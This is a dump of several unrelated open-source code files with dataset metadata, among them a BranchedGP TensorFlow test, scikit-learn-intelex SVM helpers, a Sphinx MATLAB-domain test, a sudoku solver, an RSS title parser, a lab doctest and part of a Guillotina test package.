from BranchedGP import pZ_construction_singleBP
from gpflow import settings
class TestpZ(unittest.TestCase):
def test_pZ(self):
np.set_printoptions(suppress=True, precision=2)
X = np.linspace(0, 1, 4, dtype=float)[:, None]
X = np.sort(X, 0)
BP_tf = tf.placeholder(settings.float_type, shape=[])
eZ0_tf = tf.placeholder(settings.float_type, shape=(X.shape[0], X.shape[0]*3))
pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [1, 0]])
eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
for BP in [0, 0.2, 0.5, 1]:
print('========== BP %.2f ===========' % BP)
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
print('pZ0', pZ0)
print('eZ0', eZ0)
print('pZ', pZ)
for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
print(X[r], pZ[r, c:c+3], pZ0[r, :])
if(X[r] > BP): # after branch point should be prior
self.assertTrue(np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6),
'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
else:
self.assertTrue(np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6),
'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :])))
def test_further(self):
np.set_printoptions(suppress=True, precision=6)
# X = np.linspace(0, 1, 4, dtype=float)[:, None]
X = np.array([0.1, 0.2, 0.3, 0.4])[:, None]
BP_tf = tf.placeholder(dtype=settings.float_type, shape=[])
eZ0_tf = tf.placeholder(dtype=settings.float_type, shape=(X.shape[0], X.shape[0]*3))
pZ0 = np.array([[0.7, 0.3], [0.1, 0.9], [0.5, 0.5], [0.85, 0.15]])
eZ0 = pZ_construction_singleBP.expand_pZ0(pZ0)
BP = 0.2
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: BP, eZ0_tf: eZ0})
print('pZ0', pZ0)
print('eZ0', eZ0)
print('pZ', pZ)
for r, c in zip(range(0, X.shape[0]), range(0, X.shape[0]*3, 3)):
print(r, c)
print(X[r], pZ[r, c:c+3], pZ0[r, :])
if(X[r] > BP): # after branch point should be prior
assert np.allclose(pZ[r, c+1:c+3], pZ0[r, :], atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(pZ0[r, :]))
else:
assert np.allclose(pZ[r, c:c+3], np.array([1., 0., 0.]), atol=1e-6), 'must be the same! %s-%s' % (str(pZ[r, c:c+3]), str(np.array([1., 0., 0.])))
# from matplotlib import pyplot as plt
# plt.ion()
# plt.matshow(pZ)
eZ0z = pZ_construction_singleBP.expand_pZ0Zeros(pZ0)
r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, BP, X)
assert np.allclose(r, pZ, atol=1e-5)
# try another
pZ = tf.Session().run(pZ_construction_singleBP.make_matrix(X, BP_tf, eZ0_tf), feed_dict={BP_tf: 0.3, eZ0_tf: eZ0})
r = pZ_construction_singleBP.expand_pZ0PureNumpyZeros(eZ0z, 0.3, X)
assert np.allclose(r, pZ, atol=1e-5)
if __name__ == '__main__':
unittest.main()
| en | 0.645268 | # Generic libraries # Branching files # after branch point should be prior # X = np.linspace(0, 1, 4, dtype=float)[:, None] # after branch point should be prior # from matplotlib import pyplot as plt # plt.ion() # plt.matshow(pZ) # try another | 2.230365 | 2 |
sklearnex/svm/_common.py | cmsxbc/scikit-learn-intelex | 0 | 6614024 | #===============================================================================
# Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
def get_dual_coef(self):
    """Property getter: return the cached ``dual_coef_`` value."""
    return self.dual_coef_
def set_dual_coef(self, value):
    """Property setter for ``dual_coef_``: store the value and mirror it
    onto the backing oneDAL estimator, dropping its cached model when we
    are not inside ``fit`` (it is stale once coefficients change)."""
    self.dual_coef_ = value
    if not hasattr(self, '_onedal_estimator'):
        return
    onedal_est = self._onedal_estimator
    onedal_est.dual_coef_ = value
    if not self._is_in_fit:
        del onedal_est._onedal_model
def get_intercept(self):
    """Property getter: return the cached ``_intercept_`` value."""
    return self._intercept_
def set_intercept(self, value):
    """Property setter for ``intercept_``: cache the value and propagate
    it to the backing oneDAL estimator, dropping the cached oneDAL model
    when we are not inside ``fit`` (it is stale after the change)."""
    self._intercept_ = value
    if not hasattr(self, '_onedal_estimator'):
        return
    onedal_est = self._onedal_estimator
    onedal_est.intercept_ = value
    if not self._is_in_fit:
        del onedal_est._onedal_model
| #===============================================================================
# Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
def get_dual_coef(self):
return self.dual_coef_
def set_dual_coef(self, value):
self.dual_coef_ = value
if hasattr(self, '_onedal_estimator'):
self._onedal_estimator.dual_coef_ = value
if not self._is_in_fit:
del self._onedal_estimator._onedal_model
def get_intercept(self):
return self._intercept_
def set_intercept(self, value):
self._intercept_ = value
if hasattr(self, '_onedal_estimator'):
self._onedal_estimator.intercept_ = value
if not self._is_in_fit:
del self._onedal_estimator._onedal_model
| en | 0.752833 | #=============================================================================== # Copyright 2021 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #=============================================================================== | 1.817551 | 2 |
ipytracer/_version.py | sn0wle0pard/tracer.py | 125 | 6614025 | <reponame>sn0wle0pard/tracer.py
# -*- coding: UTF-8 -*-
# Copyright (c) <NAME>.
# Distributed under the terms of the Modified BSD License.
version_info = (0, 3, 0, 'dev')
__version__ = '.'.join(map(str, version_info))
| # -*- coding: UTF-8 -*-
# Copyright (c) <NAME>.
# Distributed under the terms of the Modified BSD License.
version_info = (0, 3, 0, 'dev')
__version__ = '.'.join(map(str, version_info)) | en | 0.709506 | # -*- coding: UTF-8 -*- # Copyright (c) <NAME>. # Distributed under the terms of the Modified BSD License. | 1.637674 | 2 |
tests/test_package_prefix.py | mhbl3/matlabdomain | 38 | 6614026 | # -*- coding: utf-8 -*-
"""
test_package_function
~~~~~~~~~~~~~~~~~~~~~
Test the autodoc extension with the matlab_keep_package_prefix option.
:copyright: Copyright 2019 by the <NAME>.
:license: BSD, see LICENSE for details.
"""
from __future__ import unicode_literals
import pickle
import os
import sys
import pytest
from sphinx import addnodes
from sphinx.testing.fixtures import make_app, test_params # noqa: F811;
from sphinx.testing.path import path
@pytest.fixture(scope='module')
def rootdir():
    # Absolute path of the directory containing this test module; the
    # test projects under roots/ are resolved relative to it.
    return path(os.path.dirname(__file__)).abspath()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_with_prefix(make_app, rootdir):
    """Default config keeps the MATLAB package prefix ('+') in signatures."""
    srcdir = rootdir / 'roots' / 'test_package_prefix'
    app = make_app(srcdir=srcdir)
    app.builder.build_all()
    # Inspect the pickled doctree: the rendered signature keeps the '+'.
    content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
    assert isinstance(content[4], addnodes.desc)
    assert content[4].astext() == '+package.func(x)\n\nReturns x'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_without_prefix(make_app, rootdir):
    """matlab_keep_package_prefix=False strips the '+' from signatures."""
    srcdir = rootdir / 'roots' / 'test_package_prefix'
    confdict = { 'matlab_keep_package_prefix' : False }
    app = make_app(srcdir=srcdir, confoverrides=confdict)
    app.builder.build_all()
    # Inspect the pickled doctree: the rendered signature has no '+'.
    content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
    assert isinstance(content[4], addnodes.desc)
    assert content[4].astext() == 'package.func(x)\n\nReturns x'
if __name__ == '__main__':
pytest.main([__file__])
| # -*- coding: utf-8 -*-
"""
test_package_function
~~~~~~~~~~~~~~~~~~~~~
Test the autodoc extension with the matlab_keep_package_prefix option.
:copyright: Copyright 2019 by the <NAME>.
:license: BSD, see LICENSE for details.
"""
from __future__ import unicode_literals
import pickle
import os
import sys
import pytest
from sphinx import addnodes
from sphinx.testing.fixtures import make_app, test_params # noqa: F811;
from sphinx.testing.path import path
@pytest.fixture(scope='module')
def rootdir():
return path(os.path.dirname(__file__)).abspath()
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_with_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_package_prefix'
app = make_app(srcdir=srcdir)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
assert isinstance(content[4], addnodes.desc)
assert content[4].astext() == '+package.func(x)\n\nReturns x'
@pytest.mark.skipif(sys.version_info < (3, 6), reason="requires python3.6 or higher")
def test_without_prefix(make_app, rootdir):
srcdir = rootdir / 'roots' / 'test_package_prefix'
confdict = { 'matlab_keep_package_prefix' : False }
app = make_app(srcdir=srcdir, confoverrides=confdict)
app.builder.build_all()
content = pickle.loads((app.doctreedir / 'index.doctree').read_bytes())
assert isinstance(content[4], addnodes.desc)
assert content[4].astext() == 'package.func(x)\n\nReturns x'
if __name__ == '__main__':
pytest.main([__file__])
| en | 0.669895 | # -*- coding: utf-8 -*- test_package_function ~~~~~~~~~~~~~~~~~~~~~ Test the autodoc extension with the matlab_keep_package_prefix option. :copyright: Copyright 2019 by the <NAME>. :license: BSD, see LICENSE for details. # noqa: F811; | 1.899856 | 2 |
python/sudoku.py | kedder/sudoku | 0 | 6614027 | import sys
from copy import deepcopy
from typing import List, Set, Tuple, Iterator
# See http://lipas.uwasa.fi/~timan/sudoku/ for sample problems
class UnsolvableSudoku(Exception):
pass
class Problem:
    """A 9x9 sudoku grid plus, per cell, the set of still-possible values."""
    # _data[y][x] holds the placed value; 0 means "empty".
    _data: List[List[int]]
    # _options[y][x] holds the candidate values for (x, y); a filled cell
    # has an empty set here.
    _options: List[List[Set[int]]]
    def __init__(self) -> None:
        self._data = [[0] * 9 for y in range(9)]
        self._options = [[set(range(1, 10)) for x in range(9)]
                         for y in range(9)]
    @classmethod
    def parse(cls, raw: str) -> "Problem":
        """Build a Problem from rows of whitespace-separated digits (0 = empty)."""
        p = Problem()
        lines = raw.strip().split("\n")
        for y, line in enumerate(lines):
            for x, sn in enumerate(line.strip().split()):
                n = int(sn)
                if not n:
                    continue
                p.set(x, y, n)
        return p
    def get(self, x: int, y: int) -> int:
        """Return the value at (x, y); 0 when the cell is empty."""
        return self._data[y][x]
    def get_options(self, x: int, y: int) -> Set[int]:
        """Return the candidate values still possible at (x, y)."""
        return self._options[y][x]
    def set(self, x:int, y:int, value:int) -> None:
        """Place *value* at (x, y) and remove it from the options of the
        same row, column and 3x3 sector.

        Raises ValueError when the value already occurs in the row,
        column or sector.
        """
        # Verify the value
        row_coords = [(x, y) for x in range(9)]
        if value in set(self.get(x, y) for x, y in row_coords):
            raise ValueError(f"Value {value} is already in the row {y}")
        col_coords = [(x, y) for y in range(9)]
        if value in set(self.get(x, y) for x, y in col_coords):
            raise ValueError(f"Value {value} is already in the col {x}")
        # Top-left corner of the enclosing 3x3 sector.
        bx = x // 3 * 3
        by = y // 3 * 3
        sec_coords = [(x, y)
                      for x in range(bx, bx+3)
                      for y in range(by, by+3)]
        if value in set(self.get(x, y) for x, y in sec_coords):
            raise ValueError(f"Value {value} is already in the sector {bx, by}")
        # Set the value
        self._data[y][x] = value
        # Finally, remove from options
        # (note: the loop rebinds x and y, but the cell was already
        # written above, so the originals are no longer needed).
        self._options[y][x] = set()
        for coords in [row_coords, col_coords, sec_coords]:
            for x, y in coords:
                if value not in self._options[y][x]:
                    continue
                self._options[y][x].remove(value)
    def is_solved(self) -> bool:
        # Problem is solved when all the cells are filled
        return all(self.get(x, y) for x in range(9) for y in range(9))
    def is_solvable(self) -> bool:
        # Problem is solvable if all empty cells have at least one option
        return all(self._options[y][x] for x in range(9) for y in range(9)
                   if not self.get(x, y))
    def copy(self) -> "Problem":
        """Return a deep, independent copy (used for backtracking forks)."""
        c = Problem()
        c._data = deepcopy(self._data)
        c._options = deepcopy(self._options)
        return c
    def format(self) -> str:
        """Render the grid as text, with '|'/'-' separators between sectors."""
        out = []
        for blockn in range(3):
            for line in self._data[blockn*3 : blockn*3+3]:
                outline = ""
                outline += (" ".join(str(n or " ") for n in line[0:3]))
                outline += " | "
                outline += (" ".join(str(n or " ") for n in line[3:6]))
                outline += " | "
                outline += (" ".join(str(n or " ") for n in line[6:9]))
                out.append(outline)
            if blockn != 2:
                out.append("------+-------+------")
        return "\n".join(out)
    def print(self) -> None:
        print(self.format())
class Solver:
    """Sudoku solver: constraint propagation plus backtracking search."""
    def __init__(self, problem: Problem):
        self.problem = problem
    def solve(self) -> Problem:
        """Solve the problem in place and return it.

        Repeatedly applies "trivial" moves (cells with exactly one
        candidate); when none remain, falls back to trial-and-error via
        _fork().  Raises UnsolvableSudoku when no solution exists.
        """
        while not self.problem.is_solved():
            moves = self._get_trivial_moves()
            if not moves:
                # No trivial moves are left. We have to solve by trials and
                # errors.
                return self._fork()
            for x, y, value in moves:
                try:
                    self.problem.set(x, y, value)
                except ValueError:
                    # The batch of moves was computed from a snapshot of the
                    # candidate sets; applying one move can invalidate a
                    # later one, which makes Problem.set raise ValueError.
                    # That means this branch is a dead end and must be
                    # reported as UnsolvableSudoku so that _fork() (which
                    # only catches UnsolvableSudoku) prunes it instead of
                    # crashing the whole search.
                    raise UnsolvableSudoku()
            if not self.problem.is_solvable():
                raise UnsolvableSudoku()
        return self.problem
    def _fork(self) -> Problem:
        """Try every candidate of the first empty cell on a fresh copy."""
        # Find first cell with options
        x, y = next(self._get_empty_coords())
        opts = self.problem.get_options(x, y)
        # Try all options one by one
        for candidate in opts:
            attempt = self.problem.copy()
            attempt.set(x, y, candidate)
            subsolver = Solver(attempt)
            try:
                return subsolver.solve()
            except UnsolvableSudoku:
                # Didn't work, try another option
                continue
        # All options exhausted, we can't solve this
        raise UnsolvableSudoku()
    def _get_trivial_moves(self) -> List[Tuple[int, int, int]]:
        """Return (x, y, value) for every empty cell with one candidate."""
        moves = []
        for x, y in self._get_empty_coords():
            opts = self.problem.get_options(x, y)
            if len(opts) == 1:
                moves.append((x, y, list(opts)[0]))
        return moves
    def _get_empty_coords(self) -> Iterator[Tuple[int, int]]:
        """Yield the coordinates of every still-empty cell."""
        for x in range(9):
            for y in range(9):
                val = self.problem.get(x, y)
                if val:
                    continue
                yield (x, y)
def load_problem(fname: str) -> Problem:
    """Read a sudoku description from *fname* and parse it into a Problem."""
    with open(fname, 'r') as fobj:
        return Problem.parse(fobj.read())
def main() -> None:
    # Usage: sudoku.py <problem-file>
    problem = load_problem(sys.argv[1])
    print("Initial problem:")
    problem.print()
    solver = Solver(problem)
    solved = solver.solve()
    print("Solved problem:")
    solved.print()
if __name__ == '__main__':
main()
| import sys
from copy import deepcopy
from typing import List, Set, Tuple, Iterator
# See http://lipas.uwasa.fi/~timan/sudoku/ for sample problems
class UnsolvableSudoku(Exception):
pass
class Problem:
_data: List[List[int]]
_options: List[List[Set[int]]]
def __init__(self) -> None:
self._data = [[0] * 9 for y in range(9)]
self._options = [[set(range(1, 10)) for x in range(9)]
for y in range(9)]
@classmethod
def parse(cls, raw: str) -> "Problem":
p = Problem()
lines = raw.strip().split("\n")
for y, line in enumerate(lines):
for x, sn in enumerate(line.strip().split()):
n = int(sn)
if not n:
continue
p.set(x, y, n)
return p
def get(self, x: int, y: int) -> int:
return self._data[y][x]
def get_options(self, x: int, y: int) -> Set[int]:
return self._options[y][x]
def set(self, x:int, y:int, value:int) -> None:
# Verify the value
row_coords = [(x, y) for x in range(9)]
if value in set(self.get(x, y) for x, y in row_coords):
raise ValueError(f"Value {value} is already in the row {y}")
col_coords = [(x, y) for y in range(9)]
if value in set(self.get(x, y) for x, y in col_coords):
raise ValueError(f"Value {value} is already in the col {x}")
bx = x // 3 * 3
by = y // 3 * 3
sec_coords = [(x, y)
for x in range(bx, bx+3)
for y in range(by, by+3)]
if value in set(self.get(x, y) for x, y in sec_coords):
raise ValueError(f"Value {value} is already in the sector {bx, by}")
# Set the value
self._data[y][x] = value
# Finally, remove from options
self._options[y][x] = set()
for coords in [row_coords, col_coords, sec_coords]:
for x, y in coords:
if value not in self._options[y][x]:
continue
self._options[y][x].remove(value)
def is_solved(self) -> bool:
# Problem is solved when all the cells are filled
return all(self.get(x, y) for x in range(9) for y in range(9))
def is_solvable(self) -> bool:
# Problem is solvable if all empty cells have at least one option
return all(self._options[y][x] for x in range(9) for y in range(9)
if not self.get(x, y))
def copy(self) -> "Problem":
c = Problem()
c._data = deepcopy(self._data)
c._options = deepcopy(self._options)
return c
def format(self) -> str:
out = []
for blockn in range(3):
for line in self._data[blockn*3 : blockn*3+3]:
outline = ""
outline += (" ".join(str(n or " ") for n in line[0:3]))
outline += " | "
outline += (" ".join(str(n or " ") for n in line[3:6]))
outline += " | "
outline += (" ".join(str(n or " ") for n in line[6:9]))
out.append(outline)
if blockn != 2:
out.append("------+-------+------")
return "\n".join(out)
def print(self) -> None:
print(self.format())
class Solver:
    """Sudoku solver: constraint propagation plus backtracking search."""
    def __init__(self, problem: Problem):
        self.problem = problem
    def solve(self) -> Problem:
        """Solve the problem in place and return it.

        Repeatedly applies "trivial" moves (cells with exactly one
        candidate); when none remain, falls back to trial-and-error via
        _fork().  Raises UnsolvableSudoku when no solution exists.
        """
        while not self.problem.is_solved():
            moves = self._get_trivial_moves()
            if not moves:
                # No trivial moves are left. We have to solve by trials and
                # errors.
                return self._fork()
            for x, y, value in moves:
                try:
                    self.problem.set(x, y, value)
                except ValueError:
                    # The batch of moves was computed from a snapshot of the
                    # candidate sets; applying one move can invalidate a
                    # later one, which makes Problem.set raise ValueError.
                    # That means this branch is a dead end and must be
                    # reported as UnsolvableSudoku so that _fork() (which
                    # only catches UnsolvableSudoku) prunes it instead of
                    # crashing the whole search.
                    raise UnsolvableSudoku()
            if not self.problem.is_solvable():
                raise UnsolvableSudoku()
        return self.problem
    def _fork(self) -> Problem:
        """Try every candidate of the first empty cell on a fresh copy."""
        # Find first cell with options
        x, y = next(self._get_empty_coords())
        opts = self.problem.get_options(x, y)
        # Try all options one by one
        for candidate in opts:
            attempt = self.problem.copy()
            attempt.set(x, y, candidate)
            subsolver = Solver(attempt)
            try:
                return subsolver.solve()
            except UnsolvableSudoku:
                # Didn't work, try another option
                continue
        # All options exhausted, we can't solve this
        raise UnsolvableSudoku()
    def _get_trivial_moves(self) -> List[Tuple[int, int, int]]:
        """Return (x, y, value) for every empty cell with one candidate."""
        moves = []
        for x, y in self._get_empty_coords():
            opts = self.problem.get_options(x, y)
            if len(opts) == 1:
                moves.append((x, y, list(opts)[0]))
        return moves
    def _get_empty_coords(self) -> Iterator[Tuple[int, int]]:
        """Yield the coordinates of every still-empty cell."""
        for x in range(9):
            for y in range(9):
                val = self.problem.get(x, y)
                if val:
                    continue
                yield (x, y)
def load_problem(fname: str) -> Problem:
with open(fname, 'r') as f:
probstr = f.read()
return Problem.parse(probstr)
def main() -> None:
problem = load_problem(sys.argv[1])
print("Initial problem:")
problem.print()
solver = Solver(problem)
solved = solver.solve()
print("Solved problem:")
solved.print()
if __name__ == '__main__':
main()
| en | 0.87793 | # See http://lipas.uwasa.fi/~timan/sudoku/ for sample problems # Verify the value # Set the value # Finally, remove from options # Problem is solved when all the cells are filled # Problem is solvable if all empty cells have at least one option # No trivial moves are left. We have to solve by trials and # errors. # Find first cell with options # Try all options one by one # Didn't work, try another option # All options exhausted, we can't solve this | 3.49929 | 3 |
datasets/tracket_num.py | richiesui/Deep-Association-Learning | 70 | 6614028 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def get_tracket_num(dataset_name):
    """Return the list of tracklet counts for a supported dataset name."""
    tracklet_counts = {
        'MARS': [1816, 1957, 1321, 750, 1880, 574],
        'PRID2011': [89, 89],
        'iLIDS-VID': [150, 150],
    }
    if dataset_name not in tracklet_counts:
        raise ValueError('You must supply the dataset name as '
                         '-- MARS, PRID2011, iLIDS-VID')
    # Return a fresh list each call, matching the original literal returns.
    return list(tracklet_counts[dataset_name])
| from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def get_tracket_num(dataset_name):
    """Return the list of tracklet counts for a supported dataset name.

    Supported names: 'MARS', 'PRID2011', 'iLIDS-VID'; any other name
    raises ValueError.
    """
    if dataset_name == 'MARS':
        return [1816, 1957, 1321, 750, 1880, 574]
    elif dataset_name == 'PRID2011':
        return [89, 89]
    elif dataset_name == 'iLIDS-VID':
        return [150, 150]
    else:
        raise ValueError('You must supply the dataset name as '
                         '-- MARS, PRID2011, iLIDS-VID')
| none | 1 | 2.167452 | 2 | |
WebMirror/management/rss_parser_funcs/feed_parse_extractWwwJustreadsNet.py | fake-name/ReadableWebProxy | 193 | 6614029 | <gh_stars>100-1000
def extractWwwJustreadsNet(item):
	'''
	Parser for 'www.justreads.net'

	Maps a feed item's title to a (series, volume, chapter) release
	message via tag prefixes; returns None for previews and items with
	no volume/chapter information.
	'''
	vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
	if not (chp or vol) or "preview" in item['title'].lower():
		return None
	# (tag-in-title, canonical series name, translation type)
	titlemap = [
		('[ATP] ', 'Accompanying the Phoenix', 'translated'),
		('[Q] ', 'Qingge [Rebirth]', 'translated'),
		('[AOOO] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
		('[OASNG] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
		('[RJWSHH] ', 'Rebirth: the Journey of a Wife Spoiling Her Husband', 'translated'),
		('Master of Dungeon', 'Master of Dungeon', 'oel'),
	]
	# First matching tag wins; comparison is case-insensitive.
	for titlecomponent, name, tl_type in titlemap:
		if titlecomponent.lower() in item['title'].lower():
			return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | def extractWwwJustreadsNet(item):
'''
Parser for 'www.justreads.net'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
titlemap = [
('[ATP] ', 'Accompanying the Phoenix', 'translated'),
('[Q] ', 'Qingge [Rebirth]', 'translated'),
('[AOOO] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
('[OASNG] ', 'The Otherworldly Adventures of a Super Naive Girl', 'translated'),
('[RJWSHH] ', 'Rebirth: the Journey of a Wife Spoiling Her Husband', 'translated'),
('Master of Dungeon', 'Master of Dungeon', 'oel'),
]
for titlecomponent, name, tl_type in titlemap:
if titlecomponent.lower() in item['title'].lower():
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False | en | 0.345559 | Parser for 'www.justreads.net' | 2.445191 | 2 |
pyraliddemo/tests/__init__.py | sfarrens/pyraliddemo | 3 | 6614030 | <reponame>sfarrens/pyraliddemo
# -*- coding: utf-8 -*-
"""UNIT TESTS.
Unit testing framework for the package.
"""
| # -*- coding: utf-8 -*-
"""UNIT TESTS.
Unit testing framework for the package.
""" | en | 0.733147 | # -*- coding: utf-8 -*- UNIT TESTS. Unit testing framework for the package. | 1.086566 | 1 |
lab/lab08/tests/Keyboard.py | AnthonyNg404/61A | 0 | 6614031 | test = {
'name': 'Keyboard',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> b1 = Button(0, "H")
>>> b2 = Button(1, "I")
>>> k = Keyboard(b1, b2)
>>> k.buttons[0].key
'H'
>>> k.press(1)
'I'
>>> k.press(2) #No button at this position
''
>>> k.typing([0, 1])
'HI'
>>> k.typing([1, 0])
'IH'
>>> b1.times_pressed
2
>>> b2.times_pressed
3
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '>>> from lab08_extra import *',
'teardown': '',
'type': 'doctest'
}
]
}
| test = {
'name': 'Keyboard',
'points': 0,
'suites': [
{
'cases': [
{
'code': r"""
>>> b1 = Button(0, "H")
>>> b2 = Button(1, "I")
>>> k = Keyboard(b1, b2)
>>> k.buttons[0].key
'H'
>>> k.press(1)
'I'
>>> k.press(2) #No button at this position
''
>>> k.typing([0, 1])
'HI'
>>> k.typing([1, 0])
'IH'
>>> b1.times_pressed
2
>>> b2.times_pressed
3
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '>>> from lab08_extra import *',
'teardown': '',
'type': 'doctest'
}
]
}
| en | 0.41125 | >>> b1 = Button(0, "H") >>> b2 = Button(1, "I") >>> k = Keyboard(b1, b2) >>> k.buttons[0].key 'H' >>> k.press(1) 'I' >>> k.press(2) #No button at this position '' >>> k.typing([0, 1]) 'HI' >>> k.typing([1, 0]) 'IH' >>> b1.times_pressed 2 >>> b2.times_pressed 3 | 2.569031 | 3 |
guillotina/test_package.py | Qiwn/guillotina | 0 | 6614032 | # this is for testing.py, do not import into other modules
from guillotina import configure
from guillotina import schema
from guillotina.async_util import IAsyncUtility
from guillotina.behaviors.instance import AnnotationBehavior
from guillotina.behaviors.instance import ContextBehavior
from guillotina.behaviors.properties import ContextProperty
from guillotina.content import Item
from guillotina.content import Resource
from guillotina.directives import index_field
from guillotina.directives import metadata
from guillotina.directives import write_permission
from guillotina.exceptions import NoIndexField
from guillotina.fields import CloudFileField
from guillotina.files import BaseCloudFile
from guillotina.files.utils import generate_key
from guillotina.interfaces import IApplication
from guillotina.interfaces import IContainer
from guillotina.interfaces import IExternalFileStorageManager
from guillotina.interfaces import IFile
from guillotina.interfaces import IFileField
from guillotina.interfaces import IIDGenerator
from guillotina.interfaces import IItem
from guillotina.interfaces import IJSONToValue
from guillotina.interfaces import IObjectAddedEvent
from guillotina.interfaces import IRequest
from guillotina.interfaces import IResource
from guillotina.response import HTTPUnprocessableEntity
from guillotina.schema import Object
from guillotina.schema.interfaces import IContextAwareDefaultFactory
from shutil import copyfile
from zope.interface import implementer
from zope.interface import Interface
import json
import os
import tempfile
import typing
app_settings = {
'applications': ['guillotina']
}
TERM_SCHEMA = json.dumps({
'type': 'object',
'properties': {
'label': {'type': 'string'},
'number': {'type': 'number'}
},
})
@implementer(IContextAwareDefaultFactory)
class ContextDefaultFactory:
def __call__(self, context):
return 'foobar'
CATEGORIES_MAPPING = {
'dynamic': False,
'type': 'nested',
}
class IExample(IResource):
metadata('categories')
index_field('boolean_field', type='boolean')
boolean_field = schema.Bool(required=False)
index_field('categories', field_mapping=CATEGORIES_MAPPING)
categories = schema.List(
title='categories',
default=[],
value_type=schema.JSONField(
title='term',
schema=TERM_SCHEMA)
)
textline_field = schema.TextLine(
title='kk', widget='testing', required=False)
text_field = schema.Text(required=False)
dict_value = schema.Dict(
key_type=schema.TextLine(),
value_type=schema.TextLine(),
required=False
)
datetime = schema.Datetime(required=False)
write_permission(write_protected='example.MyPermission')
write_protected = schema.TextLine(
title='Write protected field',
required=False,
)
default_factory_test = schema.Text(
defaultFactory=lambda: 'foobar'
)
context_default_factory_test = schema.Text(
defaultFactory=ContextDefaultFactory()
)
@index_field.with_accessor(
    IExample, 'categories_accessor', field='categories')
def categories_index_accessor(ob):
    """Index accessor: the category labels, or no index value when empty."""
    if not ob.categories:
        raise NoIndexField
    return [category['label'] for category in ob.categories]
@index_field.with_accessor(IExample, 'foobar_accessor')
def foobar_accessor(ob):
    # Constant accessor used by tests to verify accessor-based indexing.
    return 'foobar'
configure.permission('example.MyPermission', 'example permission')
@implementer(IExample)
class Example(Resource):
pass
class IMarkerBehavior(Interface):
pass
class ITestBehavior(Interface):
foobar = schema.TextLine(required=False)
foobar_context = schema.TextLine(required=False, default='default-foobar')
@configure.behavior(
title="",
provides=ITestBehavior,
marker=IMarkerBehavior,
for_="guillotina.interfaces.IResource")
class GTestBehavior(AnnotationBehavior):
foobar_context = ContextProperty('foobar_context')
class ITestContextBehavior(Interface):
foobar = schema.TextLine()
class IMarkerTestContextBehavior(Interface):
pass
@configure.behavior(
title="",
provides=ITestContextBehavior,
marker=IMarkerTestContextBehavior,
for_="guillotina.interfaces.IResource")
class GContextTestBehavior(ContextBehavior):
pass
class ITestNoSerializeBehavior(Interface):
foobar = schema.TextLine()
@configure.behavior(
title="",
provides=ITestNoSerializeBehavior,
for_="guillotina.interfaces.IResource")
class GTestNoSerializeBehavior(ContextBehavior):
auto_serialize = False
class IFileContent(IItem):
file = CloudFileField(required=False)
@configure.contenttype(
schema=IFileContent, type_name="File",
behaviors=[
"guillotina.behaviors.dublincore.IDublinCore"
])
class FileContent(Item):
pass
@configure.subscriber(
for_=(IFileContent, IObjectAddedEvent), priority=-1000)
async def foobar_sub(ob, evt):
pass
@configure.subscriber(
for_=(IResource, IObjectAddedEvent), priority=-1000)
def sync_foobar_sub(ob, evt):
if not hasattr(evt, 'called'):
evt.called = 0
evt.called += 1
configure.register_configuration(Example, dict(
context=IContainer,
schema=IExample,
type_name="Example",
behaviors=[
